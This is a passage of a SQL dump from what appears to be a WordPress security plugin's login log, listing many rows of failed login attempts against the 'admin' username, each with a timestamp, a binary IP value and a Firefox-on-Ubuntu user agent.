rv:62.0) Gecko/20100101 Firefox/62.0'),(3251,5713,1629227058.470140,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3252,5715,1629227600.938496,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@oxI','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3253,5716,1629227883.824938,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3254,5717,1629228185.021288,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3255,5718,1629228472.231678,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��|�\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3256,5719,1629228760.039541,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3257,5720,1629229037.654630,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���a��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3258,5721,1629229342.423465,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Ȗ��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3259,5722,1629229625.749732,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k��2','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3260,5723,1629229889.149389,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3261,5725,1629230498.894246,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Oe,','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3262,5726,1629230764.099742,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%�[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3263,5727,1629231026.398746,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3264,5728,1629231365.568999,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��.e�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3265,5729,1629231647.308353,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3�e2','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3266,5729,1629231647.368081,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3�e2','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3267,5730,1629231937.532547,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3268,5731,1629232253.721720,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��T�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3269,5732,1629232555.691620,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���1T&','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3270,5733,1629232823.074028,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���p�-','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3271,5734,1629233152.167494,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����jQ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3272,5734,1629233152.190336,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����jQ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3273,5735,1629233432.716234,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3274,5736,1629233681.912940,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3275,5737,1629234031.857046,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ϔK','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3276,5737,1629234031.899929,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ϔK','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3277,5738,1629234298.307133,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���YcD','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3278,5739,1629234599.593971,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���A�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3279,5739,1629234599.658410,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���A�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3280,5740,1629234893.736037,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@rP','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3281,5741,1629235242.884484,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��{��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3282,5742,1629235532.502035,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3283,5743,1629235872.679599,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����X�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3284,5744,1629236186.158680,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\\>cc','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3285,5744,1629236186.203885,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\\>cc','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3286,5745,1629236520.333819,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3287,5746,1629236834.497676,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���_nq','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3288,5747,1629237126.246937,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����<�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3289,5747,1629237126.300371,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����<�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3290,5748,1629237485.990884,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���t�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3291,5748,1629237486.040597,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���t�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3292,5749,1629237770.110322,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3293,5749,1629237770.142147,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3294,5750,1629238027.659251,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��w��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3295,5751,1629238366.744313,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���[J�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3296,5753,1629239015.950265,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���VBe','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3297,5754,1629239306.516614,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��t�$','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3298,5755,1629239644.586271,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3299,5756,1629239977.775211,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Z�_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3300,5757,1629240268.300021,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�y�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3301,5758,1629240590.326037,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\n�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3302,5759,1629240907.919239,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���8-2','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3303,5760,1629241215.243982,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3304,5761,1629241556.898638,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\rC1<','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3305,5762,1629241864.317084,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����	�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3306,5763,1629242188.133855,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���5T�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3307,5765,1629242813.313530,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��+�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3308,5766,1629243474.772423,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3309,5767,1629243820.297161,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3310,5768,1629244142.069691,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��|�\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3311,5769,1629244402.982492,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\n�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3312,5770,1629244795.490017,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3313,5771,1629245072.303342,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@w','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3314,5772,1629245443.792124,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3315,5773,1629245773.824498,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3316,5774,1629246099.948212,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����,�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3317,5775,1629246432.539776,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����\'B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3318,5775,1629246432.601241,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����\'B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3319,5776,1629246721.943194,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Y��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3320,5777,1629247051.336680,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����R{','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3321,5778,1629247433.931603,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@Z0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3322,5778,1629247433.988574,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@Z0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3323,5779,1629247796.146491,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3324,5780,1629248120.457030,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����dl','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3325,5780,1629248120.560290,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����dl','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3326,5781,1629248458.917853,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QE8/','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3327,5782,1629248812.438352,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Y�ji','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3328,5783,1629249171.359324,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-wT�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3329,5784,1629249453.376338,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��*��U','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3330,5785,1629249846.026747,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��*��U','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3331,5785,1629249846.086515,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��*��U','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3332,5786,1629250205.364174,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��e >�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3333,5787,1629250517.634797,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ψ.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3334,5788,1629250858.786084,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��νUX','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3335,5788,1629250858.858325,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��νUX','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3336,5789,1629251267.639587,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����jQ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3337,5789,1629251267.654433,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����jQ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3338,5790,1629251607.925621,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\n��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3339,5790,1629251607.958424,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\n��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3340,5791,1629251990.153308,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��t���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3341,5792,1629252314.928242,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3342,5793,1629252667.138004,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>��G','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3343,5794,1629253050.397310,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���ֻ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3344,5795,1629253784.010105,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���ࣶ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3345,5796,1629254104.319278,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3346,5797,1629254446.110814,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3347,5798,1629255506.845747,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�^_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3348,5799,1629255700.923474,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3349,5800,1629255953.338592,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g|_Y','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3350,5801,1629256387.883834,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���VE3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3351,5802,1629256601.618062,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\rQ(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3352,5803,1629256787.358040,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��`}��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3353,5804,1629257226.889803,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����O','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3354,5805,1629257414.694506,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��|�f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3355,5806,1629257618.179973,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����V�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3356,5807,1629257830.347381,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ŜJ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3357,5808,1629258026.564994,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;�j','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3358,5808,1629258026.679124,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;�j','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3359,5809,1629258226.146157,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���, ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3360,5810,1629258432.048103,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3361,5811,1629258623.274582,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���B�r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3362,5812,1629258831.344128,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3�8�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3363,5813,1629259028.304784,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3364,5813,1629259028.379189,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3365,5814,1629259228.857876,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g|]�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3366,5815,1629259446.789366,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Oe,','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3367,5816,1629259629.598358,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���vSF','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3368,5817,1629259829.798693,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3369,5818,1629260031.018764,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��^+.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3370,5819,1629260264.186103,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3371,5820,1629260439.279454,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���ֻ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3372,5821,1629260641.416684,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��؉�7','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3373,5822,1629260838.974703,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C�=�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3374,5823,1629261060.770573,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���_<','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3375,5824,1629261447.217603,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@om�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3376,5825,1629261677.691417,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3�e2','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3377,5826,1629261869.335368,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%a�*','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3378,5827,1629262086.072083,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����X�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3379,5828,1629262262.671985,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����R{','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3380,5829,1629262460.631464,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3381,5830,1629262662.123408,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3382,5831,1629262870.950988,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��=�F�','Mozilla/5.0 